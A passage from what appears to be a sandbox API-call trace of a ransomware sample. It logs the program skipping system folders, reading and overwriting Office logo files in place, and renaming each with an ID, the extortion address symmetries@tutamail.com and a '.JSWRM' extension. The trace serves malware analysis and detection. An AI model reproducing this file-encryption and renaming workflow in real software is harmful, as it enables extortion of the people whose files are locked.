cFileName="WinProjLogoSmall.scale-140.png", cAlternateFileName="WIBBE1~1.PNG")) returned 1 [0134.156] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2=".") returned 1 [0134.156] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="..") returned 1 [0134.156] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="...") returned 1 [0134.156] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="windows") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="recovery") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="perflogs") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="documents and settings") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="$RECYCLE.BIN") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="system volume information") returned 1 [0134.157] lstrcmpiW (lpString1="WinProjLogoSmall.scale-140.png", lpString2="msocache") returned 1 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-140.png", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-140.png", lpUsedDefaultChar=0x0) returned 30 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.157] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.157] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-140.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.158] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2153) returned 1 [0134.158] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.158] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0134.218] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.218] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0134.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0134.219] CloseHandle (hObject=0x238) returned 1 [0134.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0134.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0134.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0134.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0134.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0134.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0134.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0134.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0134.219] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-140.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-140.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-140.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-140.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0134.222] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xacd, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.scale-180.png", cAlternateFileName="WIB5A3~1.PNG")) returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2=".") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="..") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="...") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="windows") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="recovery") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="perflogs") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="documents and settings") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="$RECYCLE.BIN") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="system volume information") returned 1 [0134.222] lstrcmpiW (lpString1="WinProjLogoSmall.scale-180.png", lpString2="msocache") returned 1 [0134.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d578 [0134.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0134.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x2410d8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0134.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d578 | out: hHeap=0x1e0000) returned 1 [0134.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d608 [0134.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0134.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0134.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-180.png", cchWideChar=30, lpMultiByteStr=0x2412e0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-180.png", lpUsedDefaultChar=0x0) returned 30 [0134.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d608 | out: hHeap=0x1e0000) returned 1 [0134.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0134.223] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0134.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.223] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0134.223] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-180.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.224] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2765) returned 1 [0134.224] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.224] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xac0) returned 0x24e1d8 [0134.224] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0xac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0xac0, lpOverlapped=0x0) returned 1 [0134.226] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.226] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0xac0, lpOverlapped=0x0) returned 1 [0134.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0134.226] CloseHandle (hObject=0x238) returned 1 [0134.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0134.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0134.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.226] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0134.226] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.226] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0134.227] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0134.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0134.227] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0134.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0134.227] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.227] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-180.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-180.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-180.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-180.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0134.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0134.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0134.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0134.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0134.228] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a7e29bd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a7e29bd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a7e29bd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x676, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinProjLogoSmall.scale-80.png", cAlternateFileName="WI3748~1.PNG")) returned 1 [0134.228] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2=".") returned 1 [0134.228] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="..") returned 1 [0134.228] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="...") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="windows") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="recovery") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="perflogs") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="documents and settings") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="$RECYCLE.BIN") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="system volume information") returned 1 [0134.229] lstrcmpiW (lpString1="WinProjLogoSmall.scale-80.png", lpString2="msocache") returned 1 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0134.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WinProjLogoSmall.scale-80.png", cchWideChar=29, lpMultiByteStr=0x240f48, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WinProjLogoSmall.scale-80.png", lpUsedDefaultChar=0x0) returned 29 [0134.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0134.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0134.229] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0134.229] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0134.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-80.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0134.230] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1654) returned 1 [0134.230] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x670) returned 0x2323e8 [0134.230] ReadFile (in: hFile=0x238, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e89c*=0x670, lpOverlapped=0x0) returned 1 [0134.232] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0134.232] WriteFile (in: hFile=0x238, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e898*=0x670, lpOverlapped=0x0) returned 1 [0134.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2323e8 | out: hHeap=0x1e0000) returned 1 [0134.233] CloseHandle (hObject=0x238) returned 1 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0134.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0134.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0134.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0134.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0134.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0134.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b830 [0134.233] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0134.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0134.233] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0134.233] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-80.png" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-80.png"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\LogoImages\\WinProjLogoSmall.scale-80.png.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\logoimages\\winprojlogosmall.scale-80.png.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0134.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0134.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0134.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0134.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0134.234] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0134.234] FindNextFileW (in: hFindFile=0x232100, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1a8c7801, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1a8c7801, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1a8c7801, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8d7, dwReserved0=0xf1348, dwReserved1=0x0, cFileName="WinWordLogo.contrast-black_scale-100.png", cAlternateFileName="WI8B9B~1.PNG")) returned 1 [0134.234] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2=".") returned 1 [0134.234] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="..") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="...") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="windows") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="recovery") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="perflogs") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="documents and settings") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="$RECYCLE.BIN") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="system volume information") returned 1 [0134.235] lstrcmpiW (lpString1="WinWordLogo.contrast-black_scale-100.png", lpString2="msocache") 